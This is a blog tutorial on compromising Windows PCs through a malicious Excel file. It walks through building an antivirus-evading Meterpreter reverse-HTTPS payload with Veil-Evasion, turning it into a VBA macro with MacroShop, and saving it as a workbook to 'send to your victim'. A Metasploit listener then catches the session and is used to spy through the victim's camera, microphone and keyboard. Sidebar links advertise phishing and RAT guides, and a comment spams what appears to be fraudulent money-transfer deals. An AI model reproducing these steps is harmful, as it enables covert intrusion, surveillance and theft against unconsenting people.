how to hack windows 7 8 10

How To Hack Windows 7/8/10 Using an Excel File in Kali Linux

How to hack windows 7/8/10: Guys, there are lots of ways to hack windows pc but some of them work and some doesn’t. In this post, we will learn how to hack windows 7/8/10 using an excel file.

Yes, you heard it right. We are going to use an excel file to hack windows. For this purpose we will use following tools.

– Kali Linux

– Veil Evasion Framework

– MacroShop

– Microsoft Excel in Windows PC

Minecraft Story Mode Apk Download

How to Hack Windows

First of all let’s have small introduction to Veil Evasion and MacroShop tool. Veil-Evasion is a tool written in python which is used to generate payloads that bypass common ant viruses.

Macroshop is basically a collection of scripts that helps to deliver payloads using office macros.

Now let’s have breakdown of what we are going to do throughout our tutorial.

– Create payload using Veil-Evasion

– Generate script using Macroshop

– Inject script into excel file

– And hack!!!!

How To Make Virus In Just 30 Seconds

How to Hack Windows 7/8/10 using Excel File

how to hack windows 7 8 10

Step 1- We need to download Veil-Evasion and Macroshop tool on desktop. So, fire up kali linux, open terminal.

Change the directory from root to Desktop in terminal.

cd desktop

Use these commands one by one to download tools from github.

git clone https://github.com/Veil-Framework/Veil-Evasion.git

git clone https://github.com/khr0x40sh/MacroShop.git

Both of our handy tools have been downloaded on desktop. Move on to next step.

Step 2- Now we must setup veil-evasion first before using it.

See also  What is Schema in Database? Types of Database Schema and Its Examples

Go to Veil-Evasion/setup folder in terminal.

cd Veil-Evasion/setup

Execute setup.sh file.

./setup.sh

It will take some time to setup. You must be connected to internet while doing this.

A Basic Introduction to Database Schema

Step 3- After setting up Veil-Evasion Framework, it’s time to create payload. Navigate to veil-evasion folder on desktop in terminal.

cd /root/Desktop/ Veil-Evasion/

Execute Veil-Evasion.py file.

./Veil-Evasion.py

Step 4-Now you will see Veil-Evasion framework’s interface. It is pretty easy to use. Use these small steps one by one to generate payload.

Type show and hit enter to get list of available payloads indexed by number.

Type use command to use any payload. In our case we will use powershell/meterpreter/reverse_https payload. It’s on number 23. So type use 23 and hit enter.

Now we need to set LHOST and LPORT values for our payload as listening host and listening port. Use these commands one by one.

set LHOST <listening_ipaddress>

set LPORT <listening_port>

Replace <listening_ipaddress> and <listening_port> with the ip address and port you want to listen on e.i. ip address of your kali linux machine.

set payload options in veil evasion

Finally, type generate and hit enter to get payload. It will ask you for the name of payload file, just type any name, for the sake of this tutorial we will use name payload.

After generating file, you will see the path of output directory where our payload is generated. Payload will be in .bat format.

Copy this path from terminal.

veil evasion payload generated

Press Ctrl+C to get out of Veil-Evasion tool.

Now copy the payload to desktop, use below command.

See also  The Power of Virtual Numbers to Receive SMS and Managing Your Online Accounts

cp <output_path> /root/Desktop/

Hack Android Phone Using Spynote RAT

Step 5- We will use macroshop now to get script. Navigate to MacroShop directory that we downloaded on desktop.

cd /root/Desktop/MacroShop/

 Use macro_safe.py file to get script.

./macro_safe.py /root/Desktop/payload.bat /root/Desktop/script.txt

Step 6- Now you have a script.txt file on desktop which contains code of payload. We need to inject this script in an excel file. So, open the script.txt file and copy all code.

Open Microsoft Excel software.

Press Alt+F11 to open macro menu. Now double click on This Workbook option available on left panel.

Now paste the code of script.txt file here.

inject script

Click on Save button.

You will see Save As dialogue box. Type name of excel, let’s say students_data and in Save As Type option select Excel Macro Enabled Workbook and save file.

save excel macro file

Send this file to your victim.

How to Port Forward Without Router

Step 7- Lets start our listener. Open terminal and start msfconsole. Use these steps to setup listener.

Type msfconsole and hit enter to start metasploit framework.

Use below command to setup listening handler.

 use exploit/multi/handler

Set Payload, LHOST and LPORT in handler using these commands one by one.

set PAYLOAD windows/meterpreter/reverse_https

set LHOST <listening_ip>

set LPORT <listening_port>

Replace <listening_ip> and <listening_port> with your ip address and port that you used while creating payload in step 3.

Finally type run and hit enter to start the listener.

setup handler

Now all you need to do it wait for your victim to open the file. As soon as your victim opens the file you will get meterpreter session.

See also  How To Hack Facebook Account Using Phishing | Best Hacking Method

Call of Duty Zombies APK

After getting session you can perform various useful tasks like capturing photos from camera, disabling or enabling mouse and keyboard, live video or audio recording using camera or mic.

To get list of all useful commands, type help and hit enter.

That’s all about how to hack windows 7/8/10 using excel file.

If you face any problem while doing it, please let me know by comments.

Also don’t forget to share this post with your friends.

Best Wifi Hacking Apps For Android Download

2 thoughts on “How To Hack Windows 7/8/10 Using an Excel File in Kali Linux”

  1. Greetings! I know this is kinda off topic nevertheless I’d figured I’d ask. Would you be interested in exchanging links or maybe guest authoring a blog post or vice-versa? My website covers a lot of the same topics as yours and I feel we could greatly benefit from each other. If you might be interested feel free to send me an email. I look forward to hearing from you! Awesome blog by the way!

  2. Hi there! I hope the New Year finds you well. I was wondering if anyone would be interested in making discount paypal, WU or moneygram transfers. Check this out http://alltraders.net because we have some of the most exclusive deals on the clearnet. We’re also selling electronics for up to 70 off at times! You have to message me quick because those are often grabbed as soon as I list them. Go to http://alltraders.net and order today!

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top